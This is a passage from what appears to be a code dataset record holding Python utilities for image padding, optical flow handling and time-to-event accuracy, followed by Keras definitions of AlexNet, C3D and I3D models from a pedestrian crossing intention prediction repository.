progress\n    Args:\n        progress: Progress thus far\n    \"\"\"\n    barLength = 20  # Modify this to change the length of the progress bar\n    status = \"\"\n    if isinstance(progress, int):\n        progress = float(progress)\n\n    block = int(round(barLength * progress))\n    text = \"\\r[{}] {:0.2f}% {}\".format(\"#\" * block + \"-\" * (barLength - block), progress * 100, status)\n    sys.stdout.write(text)\n    sys.stdout.flush()\n\n\ndef img_pad_pil(img, mode='warp', size=224):\n    \"\"\"\n    Pads and/or resizes a given image\n    Args:\n        img: The image to be cropped and/or padded\n        mode: The type of padding or resizing. 
Options are,\n            warp: crops the bounding box and resizes it to the output size\n            same: only crops the image\n            pad_same: maintains the original size of the cropped box and pads with zeros\n            pad_resize: crops the image and resizes the cropped box in a way that the longer edge is equal to\n            the desired output size in that direction while maintaining the aspect ratio. The rest\n            of the image is padded with zeros\n            pad_fit: maintains the original size of the cropped box unless the image is bigger than the size\n            in which case it scales the image down, and then pads it\n        size: Target size of image\n    Return:\n        Padded image\n    \"\"\"\n    assert (mode in ['same', 'warp', 'pad_same', 'pad_resize', 'pad_fit']), 'Pad mode %s is invalid' % mode\n    image = img.copy()\n    if mode == 'warp':\n        warped_image = image.resize((size, size), PIL.Image.NEAREST)\n        return warped_image\n    elif mode == 'same':\n        return image\n    elif mode in ['pad_same', 'pad_resize', 'pad_fit']:\n        img_size = image.size  # size is in (width, height)\n        ratio = float(size) / max(img_size)\n        if mode == 'pad_resize' or \\\n                (mode == 'pad_fit' and (img_size[0] > size or img_size[1] > size)):\n            img_size = tuple([int(img_size[0] * ratio), int(img_size[1] * ratio)])\n            image = image.resize(img_size, PIL.Image.NEAREST)\n        padded_image = PIL.Image.new(\"RGB\", (size, size))\n        padded_image.paste(image, ((size - img_size[0]) // 2,\n                    (size - img_size[1]) // 2))\n        return padded_image\n\ndef img_pad(img, mode='warp', size=224):\n    \"\"\"\n    Pads and/or resizes a given image\n    Args:\n        img: The image to be cropped and/or padded\n        mode: The type of padding or resizing. Options are,\n            warp: crops the bounding box and resizes it to the output size\n            same: only crops the image\n            pad_same: maintains the original size of the cropped box and pads with zeros\n            pad_resize: crops the image and resizes the cropped box in a way that the longer edge is equal to\n            the desired output size in that direction while maintaining the aspect ratio. 
The rest\n            of the image is padded with zeros\n            pad_fit: maintains the original size of the cropped box unless the image is bigger than the size\n            in which case it scales the image down, and then pads it\n        size: Target size of image\n    Return:\n        Padded image\n    \"\"\"\n    assert (mode in ['same', 'warp', 'pad_same', 'pad_resize', 'pad_fit']), 'Pad mode %s is invalid' % mode\n    image = np.copy(img)\n    if mode == 'warp':\n        warped_image = cv2.resize(img, (size, size))\n        return warped_image\n    elif mode == 'same':\n        return image\n    elif mode in ['pad_same', 'pad_resize', 'pad_fit']:\n        img_size = image.shape[:2][::-1]  # reverse shape's (height, width) to (width, height)\n        ratio = float(size)/max(img_size)\n        if mode == 'pad_resize' or \\\n                (mode == 'pad_fit' and (img_size[0] > size or img_size[1] > size)):\n            img_size = tuple([int(img_size[0] * ratio), int(img_size[1] * ratio)])\n            image = cv2.resize(image, img_size)\n        padded_image = np.zeros((size, size)+(image.shape[-1],), dtype=img.dtype)\n        w_off = (size-img_size[0])//2\n        h_off = (size-img_size[1])//2\n        padded_image[h_off:h_off + img_size[1], w_off:w_off + img_size[0], :] = image\n        return padded_image\n\n\ndef bbox_sanity_check(img_size, bbox):\n    \"\"\"\n    Checks whether bounding boxes are within image boundaries.\n    If this is not the case, modifications are applied.\n    Args:\n        img_size: The size of the image\n        bbox: The bounding box coordinates\n    Return:\n        The modified/original bbox\n    \"\"\"\n    img_width, img_height = img_size\n    if bbox[0] < 0:\n        bbox[0] = 0.0\n    if bbox[1] < 0:\n        bbox[1] = 0.0\n    if bbox[2] >= img_width:\n        bbox[2] = img_width - 1\n    if bbox[3] >= img_height:\n        bbox[3] = img_height - 1\n    return bbox\n\n\ndef get_path(file_name='',\n             sub_folder='',\n             save_folder='models',\n             dataset='pie',\n             save_root_folder='data/'):\n    \"\"\"\n    Generates paths for saving model and config data.\n    Args:\n        file_name: The actual save file name, e.g. 
'model.h5'\n        sub_folder: If another folder to be created within the root folder\n        save_folder: The name of folder containing the saved files\n        dataset: The name of the dataset used\n        save_root_folder: The root folder\n    Return:\n        The full path and the path to save folder\n    \"\"\"\n    save_path = os.path.join(save_root_folder, dataset, save_folder, sub_folder)\n    if not os.path.exists(save_path):\n        os.makedirs(save_path)\n    return os.path.join(save_path, file_name), save_path\n\n\n# Optical flow utilities\nUNKNOWN_FLOW_THRESH = 1e7\nSMALLFLOW = 0.0\nLARGEFLOW = 1e8\n\n\ndef read_flow_file(optflow_path):\n    with open(optflow_path, 'rb') as f:\n        tag = np.fromfile(f, np.float32, count=1)\n        data2d = None\n        assert tag == 202021.25, 'Incorrect .flo file, {}'.format(optflow_path)\n        w = np.fromfile(f, np.int32, count=1)[0]\n        h = np.fromfile(f, np.int32, count=1)[0]\n        data2d = np.fromfile(f, np.float32, count=2 * w * h)\n        # reshape data into a 3D array (height, width, channels)\n        return np.resize(data2d, (h, w, 2))\n\n\ndef write_flow(flow, optflow_path):\n    with open(optflow_path, 'wb') as f:\n        magic = np.array([202021.25], dtype=np.float32)\n        (height, width) = flow.shape[0:2]\n        w = np.array([width], dtype=np.int32)\n        h = np.array([height], dtype=np.int32)\n        magic.tofile(f)\n        w.tofile(f)\n        h.tofile(f)\n        flow.tofile(f)\n\n\ndef make_color_wheel():\n    \"\"\"\n    Generate color wheel according to the Middlebury color code\n    :return: Color wheel\n    \"\"\"\n    RY = 15\n    YG = 6\n    GC = 4\n    CB = 11\n    BM = 13\n    MR = 6\n\n    ncols = RY + YG + GC + CB + BM + MR\n\n    colorwheel = np.zeros([ncols, 3])\n\n    col = 0\n\n    # RY\n    colorwheel[0:RY, 0] = 255\n    colorwheel[0:RY, 1] = np.transpose(np.floor(255*np.arange(0, RY) / RY))\n    col += RY\n\n    # YG\n    colorwheel[col:col+YG, 0] = 255 - np.transpose(np.floor(255*np.arange(0, YG) / YG))\n    colorwheel[col:col+YG, 1] = 255\n    col += YG\n\n    # GC\n    colorwheel[col:col+GC, 1] = 255\n    colorwheel[col:col+GC, 2] = np.transpose(np.floor(255*np.arange(0, GC) / GC))\n    col += GC\n\n    # CB\n    colorwheel[col:col+CB, 1] = 255 - np.transpose(np.floor(255*np.arange(0, CB) / CB))\n    colorwheel[col:col+CB, 2] = 255\n    col += CB\n\n    # BM\n    colorwheel[col:col+BM, 2] = 255\n    colorwheel[col:col+BM, 0] = np.transpose(np.floor(255*np.arange(0, BM) / BM))\n    col += BM\n\n    # MR\n    colorwheel[col:col+MR, 2] = 255 - np.transpose(np.floor(255 * np.arange(0, MR) / MR))\n    colorwheel[col:col+MR, 0] = 255\n\n    return colorwheel\n\n\ndef compute_color(u, v):\n    \"\"\"\n    compute optical flow color map\n    :param u: optical flow horizontal map\n    :param v: optical flow vertical map\n    :return: optical flow in color code\n    \"\"\"\n    [h, w] = u.shape\n    img = np.zeros([h, w, 3])\n    nanIdx = np.isnan(u) | np.isnan(v)\n    u[nanIdx] = 0\n    v[nanIdx] = 0\n\n    colorwheel = make_color_wheel()\n    ncols = np.size(colorwheel, 0)\n\n    rad = np.sqrt(u ** 2 + v ** 2)\n\n    a = np.arctan2(-v, -u) / np.pi\n\n    fk = (a + 1) / 2 * (ncols - 1) + 1\n\n    k0 = np.floor(fk).astype(int)\n\n    k1 = k0 + 1\n    k1[k1 == ncols + 1] = 1\n    f = fk - k0\n\n    for i in range(0, np.size(colorwheel, 1)):\n        tmp = colorwheel[:, i]\n        col0 = tmp[k0 - 1] / 255\n        col1 = tmp[k1 - 1] / 255\n        col = (1 - f) * col0 + f * col1\n\n        idx = rad <= 1\n        col[idx] = 1 - rad[idx] * (1 - col[idx])\n        notidx = np.logical_not(idx)\n\n        col[notidx] *= 0.75\n        img[:, :, i] = np.uint8(np.floor(255 * col * (1 - nanIdx)))\n\n    return img\n\n\ndef flow_to_image(flow):\n    \"\"\"\n    Convert flow into Middlebury color code image\n    :param flow: optical flow map\n    :return: optical flow image in Middlebury color\n    \"\"\"\n    u = flow[:, :, 0]\n    v = 
flow[:, :, 1]\n\n maxu = -999.\n maxv = -999.\n minu = 999.\n minv = 999.\n\n idxUnknow = (abs(u) > UNKNOWN_FLOW_THRESH) | (abs(v) > UNKNOWN_FLOW_THRESH)\n u[idxUnknow] = 0\n v[idxUnknow] = 0\n\n maxu = max(maxu, np.max(u))\n minu = min(minu, np.min(u))\n\n maxv = max(maxv, np.max(v))\n minv = min(minv, np.min(v))\n\n rad = np.sqrt(u ** 2 + v ** 2)\n maxrad = max(-1, np.max(rad))\n\n print(\"max flow: %.4f\\nflow range:\\nu = %.3f .. %.3f\\nv = %.3f .. %.3f\" % (maxrad, minu, maxu, minv, maxv))\n\n u = u / (maxrad + np.finfo(float).eps)\n v = v / (maxrad + np.finfo(float).eps)\n\n img = compute_color(u, v)\n\n idx = np.repeat(idxUnknow[:, :, np.newaxis], 3, axis=2)\n img[idx] = 0\n\n return np.uint8(img)\n\n\ndef tte_weighted_acc(tte, gt, y, weights='quadratic'):\n \"\"\"\n A function to compute time-to-event (TTE) weighted accuracy: \n 1) computes accuracy for unique TTEs in the list,\n 2) computes weighted average of accuracy scores assigning higher weight to higher TTEs.\n \n Args:\n tte: array of TTE values for each sample\n gt: ground truth sample class\n y: predicted sample class\n weights: linear or quadratic\n \"\"\"\n\n sort_idx = np.argsort(tte)\n tte_sorted = tte[sort_idx]\n unq_tte_first = np.concatenate(([True], tte_sorted[1:] != tte_sorted[:-1]))\n unq_tte = tte_sorted[unq_tte_first]\n unq_tte_count = np.diff(np.nonzero(unq_tte_first)[0])\n unq_tte_index = np.split(sort_idx, np.cumsum(unq_tte_count))\n\n acc_tte = []\n for tte, tte_idx in zip(unq_tte, unq_tte_index):\n acc_tte.append(accuracy_score(gt[tte_idx], np.round(y[tte_idx])))\n\n assert weights in ['linear', 'quadratic'], 'Weights type {} is not implemented!'.format(weights)\n\n if weights == 'quadratic':\n unq_tte = np.square(unq_tte)\n\n acc_tte = np.sum(np.multiply(acc_tte, unq_tte)/np.sum(unq_tte))\n\n return acc_tte" }, { "alpha_fraction": 0.5430303812026978, "alphanum_fraction": 0.6104931831359863, "avg_line_length": 45.088233947753906, "blob_id": "a2e9b10706037a5033b4cb0306a78def350bde83", "content_id": "8bca54cc3079cf1ac0a0ed52f477074b0cecfdc8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21938, "license_type": "permissive", "max_line_length": 115, "num_lines": 476, "path": "/base_models.py", "repo_name": "dschoerk/Pedestrian_Crossing_Intention_Prediction", "src_encoding": "UTF-8", "text": "from tensorflow.keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D\nfrom tensorflow.keras.layers import Flatten, Dropout, Activation\nfrom tensorflow.keras.layers import GlobalAveragePooling2D, GlobalMaxPooling2D\nfrom tensorflow.keras.layers import Conv3D, MaxPooling3D, ZeroPadding3D\nfrom tensorflow.keras.layers import AveragePooling3D\nfrom tensorflow.keras.layers import Reshape\nfrom tensorflow.keras.layers import Lambda, BatchNormalization\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Concatenate, Dense\nimport tensorflow.keras.backend as K\n\ndef AlexNet(include_top=True,\n weights=None,\n input_tensor=None,\n input_shape=None,\n pooling=None,\n classes=1000,\n classifier_activation='softmax'):\n '''\n Implementation of AlexNet based on the paper\n Krizhevsky, A., Sutskever, I., & Hinton, G. E. (2017). Imagenet classification with \n deep convolutional neural networks. 
Communications of the ACM, 60(6), 84-90.\n '''\n if input_shape is None:\n input_shape = (227, 227, 3)\n if input_tensor is None:\n inputs = Input(shape=input_shape)\n else:\n inputs = input_tensor\n\n x = inputs\n x = Conv2D(filters=96, kernel_size=11, strides=4, padding='valid', activation='relu')(x)\n x = MaxPooling2D(pool_size=3, strides=2, padding='valid')(x)\n x = ZeroPadding2D((2, 2))(x)\n x = Conv2D(filters=256, kernel_size=5, strides=1, padding='valid', activation='relu')(x)\n x = MaxPooling2D(pool_size=3, strides=2, padding='valid')(x)\n x = ZeroPadding2D((2, 2))(x)\n x = Conv2D(filters=384, kernel_size=3, strides=1, padding='valid', activation='relu')(x)\n x = BatchNormalization()(x)\n x = ZeroPadding2D((1, 1))(x)\n x = Conv2D(filters=384, kernel_size=3, strides=1, padding='valid', activation='relu')(x)\n x = BatchNormalization()(x)\n x = ZeroPadding2D((1, 1))(x)\n x = Conv2D(filters=256, kernel_size=3, strides=1, padding='valid', activation='relu')(x)\n x = MaxPooling2D(pool_size=3, strides=2, padding='valid')(x)\n x = BatchNormalization()(x)\n if include_top:\n x = Flatten(name='flatten')(x)\n x = Dense(4096, activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(4096, activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(classes, activation=classifier_activation)(x)\n else:\n if pooling == 'avg':\n x = GlobalAveragePooling2D()(x)\n elif pooling == 'max':\n x = GlobalMaxPooling2D()(x)\n model = Model(inputs, x, name='alexnet')\n\n # if weights == 'imagenet':\n # model.load_weights('weights/alexnet_weights_tensorflow.h5', by_name=True)\n\n return model\n\n\ndef convert_to_fcn(model, classes=2, activation='softmax',\n pooling='avg', features=False, model_type='alexnet'):\n \"\"\"\n Converts a given CNN model to a FCN model\n Args:\n model: The model object\n classes: Number of classes\n activation: Type of activation for the last layer\n pooling: Pooling type for generating features\n features: Whether to return convolutional features or apply global pooling and activation\n model_type: The type of CNN. Support alexnet, vgg16, and resnet50\n Returns:\n Model object\n \"\"\"\n num_filters = 4096\n if 'resnet' in model_type:\n num_filters = 2048\n x = Conv2D(filters=num_filters, kernel_size=(6, 6), strides=(1, 1), padding='valid')(model.output)\n x = Conv2D(filters=num_filters, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n x = Conv2D(filters=classes, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n\n if features:\n if pooling == 'avg':\n x = Lambda(lambda x: K.mean(x, axis=-1))(x)\n else:\n x = Lambda(lambda x: K.max(x, axis=-1))(x)\n x = Flatten(name='fcn_features')(x)\n else:\n x = GlobalMaxPooling2D()(x)\n x = Activation(activation)(x)\n return Model(model.input, x)\n\n\ndef C3DNet(freeze_conv_layers=False, weights=None,\n dense_activation='softmax', dropout=0.5, include_top=False,input_data = Input(shape=(16, 112, 112, 3))):\n \"\"\"\n C3D model implementation. Source: https://github.com/adamcasson/c3d\n Reference: Du Tran, Lubomir Bourdev, Rob Fergus, Lorenzo Torresani,and Manohar Paluri. \n Learning spatiotemporal features with 3D convolutional networks. 
ICCV, 2015.\n Args:\n freeze_conv_layers: Whether to freeze convolutional layers at the time of training\n weights: Pre-trained weights\n dense_activation: Activation of the last layer\n dropout: Dropout of dense layers\n include_top: Whether to add fc layers\n Returns:\n C3D model\n \"\"\"\n # input_data = Input(shape=(16, 112, 112, 3))\n model = Conv3D(64, 3, activation='relu', padding='same', name='conv1')(input_data)\n model = MaxPooling3D(pool_size=(1, 2, 2), strides=(1, 2, 2), padding='valid', name='pool1')(model)\n # 2nd layer group\n model = Conv3D(128, 3, activation='relu', padding='same', name='conv2')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool2')(model)\n # 3rd layer group\n model = Conv3D(256, 3, activation='relu', padding='same', name='conv3a')(model)\n model = Conv3D(256, 3, activation='relu', padding='same', name='conv3b')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool3')(model)\n # 4th layer group\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv4a')(model)\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv4b')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool4')(model)\n # 5th layer group\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv5a')(model)\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv5b')(model)\n model = ZeroPadding3D(padding=(0, 1, 1), name='zeropad5')(model) # ((0, 0), (0, 1), (0, 1))\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool5')(model)\n model_flatten = Flatten(name='flatten')(model)\n\n # # FC layers group\n model = Dense(4096, activation='relu', name='fc6')(model_flatten)\n model = Dropout(dropout)(model)\n model = Dense(4096, activation='relu', name='fc7')(model)\n model_fc7 = Dropout(dropout)(model)\n model_fc8 = Dense(487, activation=dense_activation, name='fc8')(model_fc7)\n\n net_model = Model(input_data, model_fc8)\n if weights is not None:\n net_model.load_weights(weights)\n\n if include_top:\n model_fc8_new = Dense(1, activation=dense_activation, name='fc8')(model_fc7)\n net_model = Model(input_data, model_fc8_new)\n if freeze_conv_layers:\n for layer in model.layers[:-5]:\n layer.trainable = False\n for layer in model.layers:\n print(layer.name, layer.trainable)\n else:\n net_model = Model(input_data, model_flatten)\n\n return net_model\n\n\ndef C3DNet2(freeze_conv_layers=False, weights=None,\n dense_activation='softmax', dropout=0.5, include_top=False,input_data=Input(shape=(16, 112, 112, 3))):\n \"\"\"\n C3D model implementation. Source: https://github.com/adamcasson/c3d\n Reference: Du Tran, Lubomir Bourdev, Rob Fergus, Lorenzo Torresani,and Manohar Paluri.\n Learning spatiotemporal features with 3D convolutional networks. 
ICCV, 2015.\n Args:\n freeze_conv_layers: Whether to freeze convolutional layers at the time of training\n weights: Pre-trained weights\n dense_activation: Activation of the last layer\n dropout: Dropout of dense layers\n include_top: Whether to add fc layers\n Returns:\n C3D model\n \"\"\"\n # Input(shape=data_sizes[i], name='input_' + data_types[i])\n # input_data = Input(shape=(16, 112, 112, 3))\n\n model = Conv3D(64, 3, activation='relu', padding='same', name='conv1_2')(input_data)\n model = MaxPooling3D(pool_size=(1, 2, 2), strides=(1, 2, 2), padding='valid', name='pool1_2')(model)\n # 2nd layer group\n model = Conv3D(128, 3, activation='relu', padding='same', name='conv2_2')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool2_2')(model)\n # 3rd layer group\n model = Conv3D(256, 3, activation='relu', padding='same', name='conv3a_2')(model)\n model = Conv3D(256, 3, activation='relu', padding='same', name='conv3b_2')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool3_2')(model)\n # 4th layer group\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv4a_2')(model)\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv4b_2')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool4_2')(model)\n # 5th layer group\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv5a_2')(model)\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv5b_2')(model)\n model = ZeroPadding3D(padding=(0, 1, 1), name='zeropad5_2')(model) # ((0, 0), (0, 1), (0, 1))\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool5_2')(model)\n model_flatten = Flatten(name='flatten_2')(model)\n\n # # FC layers group\n model = Dense(4096, activation='relu', name='fc6_2')(model_flatten)\n model = Dropout(dropout)(model)\n model = Dense(4096, activation='relu', name='fc7_2')(model)\n model_fc7 = Dropout(dropout)(model)\n model_fc8 = Dense(487, activation=dense_activation, name='fc8_2')(model_fc7)\n\n net_model = Model(input_data, model_fc8)\n if weights is not None:\n net_model.load_weights(weights)\n\n if include_top:\n model_fc8_new = Dense(1, activation=dense_activation, name='fc8_2')(model_fc7)\n net_model = Model(input_data, model_fc8_new)\n if freeze_conv_layers:\n for layer in model.layers[:-5]:\n layer.trainable = False\n for layer in model.layers:\n print(layer.name, layer.trainable)\n else:\n net_model = Model(input_data, model_flatten)\n\n return net_model\n\ndef I3DNet(freeze_conv_layers=False, weights=None, classes=1,\n dense_activation='softmax', dropout=0.5, num_channels=3, include_top=False):\n \"\"\"\n I3D model implementation. Source: https://github.com/dlpbc/keras-kinetics-i3d\n Reference: Joao Carreira and Andrew Zisserman. Quo vadis, action recognition?\n A new model and the kinetics dataset. 
CVPR, 2017.\n Args:\n freeze_conv_layers: Whether to freeze convolutional layers at the time of training\n weights: Pre-trained weights\n classes: Number of classes\n dense_activation: Activation of the last layer\n dropout: Dropout of dense layers\n include_top: Whether to add fc layers\n Returns:\n I3D model\n \"\"\"\n def conv3d_bn(x,\n filters,\n num_frames,\n num_row,\n num_col,\n padding='same',\n strides=(1, 1, 1),\n use_bias=False,\n use_activation_fn=True,\n use_bn=True,\n name=None):\n \"\"\"Utility function to apply conv3d + BN.\n\n # Arguments\n x: input tensor.\n filters: filters in `Conv3D`.\n num_frames: frames (time depth) of the convolution kernel.\n num_row: height of the convolution kernel.\n num_col: width of the convolution kernel.\n padding: padding mode in `Conv3D`.\n strides: strides in `Conv3D`.\n use_bias: use bias or not\n use_activation_fn: use an activation function or not.\n use_bn: use batch normalization or not.\n name: name of the ops; will become `name + '_conv'`\n for the convolution and `name + '_bn'` for the\n batch norm layer.\n\n # Returns\n Output tensor after applying `Conv3D` and `BatchNormalization`.\n \"\"\"\n if name is not None:\n bn_name = name + '_bn'\n conv_name = name + '_conv'\n else:\n bn_name = None\n conv_name = None\n\n x = Conv3D(\n filters, (num_frames, num_row, num_col),\n strides=strides,\n padding=padding,\n use_bias=use_bias,\n name=conv_name)(x)\n\n if use_bn:\n bn_axis = 4\n x = BatchNormalization(axis=bn_axis, scale=False, name=bn_name)(x)\n\n if use_activation_fn:\n x = Activation('relu', name=name)(x)\n\n return x\n\n channel_axis = 4\n inputs = Input(shape=(16, 224, 224, num_channels))\n\n # Downsampling via convolution (spatial and temporal)\n x = conv3d_bn(inputs, 64, 7, 7, 7, strides=(2, 2, 2), padding='same', name='Conv3d_1a_7x7')\n\n # Downsampling (spatial only)\n x = MaxPooling3D((1, 3, 3), strides=(1, 2, 2), padding='same', name='MaxPool2d_2a_3x3')(x)\n x = conv3d_bn(x, 64, 1, 1, 1, strides=(1, 1, 1), padding='same', name='Conv3d_2b_1x1')\n x = conv3d_bn(x, 192, 3, 3, 3, strides=(1, 1, 1), padding='same', name='Conv3d_2c_3x3')\n\n # Downsampling (spatial only)\n x = MaxPooling3D((1, 3, 3), strides=(1, 2, 2), padding='same', name='MaxPool2d_3a_3x3')(x)\n\n # Mixed 3b\n branch_0 = conv3d_bn(x, 64, 1, 1, 1, padding='same', name='Conv3d_3b_0a_1x1')\n\n branch_1 = conv3d_bn(x, 96, 1, 1, 1, padding='same', name='Conv3d_3b_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 128, 3, 3, 3, padding='same', name='Conv3d_3b_1b_3x3')\n\n branch_2 = conv3d_bn(x, 16, 1, 1, 1, padding='same', name='Conv3d_3b_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 32, 3, 3, 3, padding='same', name='Conv3d_3b_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_3b_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 32, 1, 1, 1, padding='same', name='Conv3d_3b_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_3b')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 3c\n branch_0 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_3c_0a_1x1')\n\n branch_1 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_3c_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 192, 3, 3, 3, padding='same', name='Conv3d_3c_1b_3x3')\n\n branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_3c_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 96, 3, 3, 3, padding='same', name='Conv3d_3c_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_3c_3a_3x3')(x)\n branch_3 = 
conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_3c_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_3c')([branch_0, branch_1, branch_2, branch_3])\n\n # Downsampling (spatial and temporal)\n x = MaxPooling3D((3, 3, 3), strides=(2, 2, 2), padding='same', name='MaxPool2d_4a_3x3')(x)\n\n # Mixed 4b\n branch_0 = conv3d_bn(x, 192, 1, 1, 1, padding='same', name='Conv3d_4b_0a_1x1')\n\n branch_1 = conv3d_bn(x, 96, 1, 1, 1, padding='same', name='Conv3d_4b_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 208, 3, 3, 3, padding='same', name='Conv3d_4b_1b_3x3')\n\n branch_2 = conv3d_bn(x, 16, 1, 1, 1, padding='same', name='Conv3d_4b_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 48, 3, 3, 3, padding='same', name='Conv3d_4b_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4b_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4b_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4b')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 4c\n branch_0 = conv3d_bn(x, 160, 1, 1, 1, padding='same', name='Conv3d_4c_0a_1x1')\n\n branch_1 = conv3d_bn(x, 112, 1, 1, 1, padding='same', name='Conv3d_4c_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 224, 3, 3, 3, padding='same', name='Conv3d_4c_1b_3x3')\n\n branch_2 = conv3d_bn(x, 24, 1, 1, 1, padding='same', name='Conv3d_4c_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 64, 3, 3, 3, padding='same', name='Conv3d_4c_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4c_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4c_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4c')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 4d\n branch_0 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_4d_0a_1x1')\n\n branch_1 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_4d_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 256, 3, 3, 3, padding='same', name='Conv3d_4d_1b_3x3')\n\n branch_2 = conv3d_bn(x, 24, 1, 1, 1, padding='same', name='Conv3d_4d_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 64, 3, 3, 3, padding='same', name='Conv3d_4d_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4d_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4d_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4d')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 4e\n branch_0 = conv3d_bn(x, 112, 1, 1, 1, padding='same', name='Conv3d_4e_0a_1x1')\n\n branch_1 = conv3d_bn(x, 144, 1, 1, 1, padding='same', name='Conv3d_4e_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 288, 3, 3, 3, padding='same', name='Conv3d_4e_1b_3x3')\n\n branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_4e_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 64, 3, 3, 3, padding='same', name='Conv3d_4e_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4e_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4e_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4e')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 4f\n branch_0 = conv3d_bn(x, 256, 1, 1, 1, padding='same', name='Conv3d_4f_0a_1x1')\n\n branch_1 = conv3d_bn(x, 160, 1, 1, 1, padding='same', name='Conv3d_4f_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 320, 3, 3, 3, padding='same', name='Conv3d_4f_1b_3x3')\n\n branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', 
name='Conv3d_4f_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 128, 3, 3, 3, padding='same', name='Conv3d_4f_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4f_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 128, 1, 1, 1, padding='same', name='Conv3d_4f_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4f')([branch_0, branch_1, branch_2, branch_3])\n\n # Downsampling (spatial and temporal)\n x = MaxPooling3D((2, 2, 2), strides=(2, 2, 2), padding='same', name='MaxPool2d_5a_2x2')(x)\n\n # Mixed 5b\n branch_0 = conv3d_bn(x, 256, 1, 1, 1, padding='same', name='Conv3d_5b_0a_1x1')\n\n branch_1 = conv3d_bn(x, 160, 1, 1, 1, padding='same', name='Conv3d_5b_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 320, 3, 3, 3, padding='same', name='Conv3d_5b_1b_3x3')\n\n branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_5b_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 128, 3, 3, 3, padding='same', name='Conv3d_5b_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 